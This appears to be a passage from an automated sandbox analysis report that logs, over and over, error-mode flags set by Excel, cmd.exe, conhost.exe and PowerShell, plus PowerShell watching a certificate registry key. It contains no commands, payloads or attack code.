Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
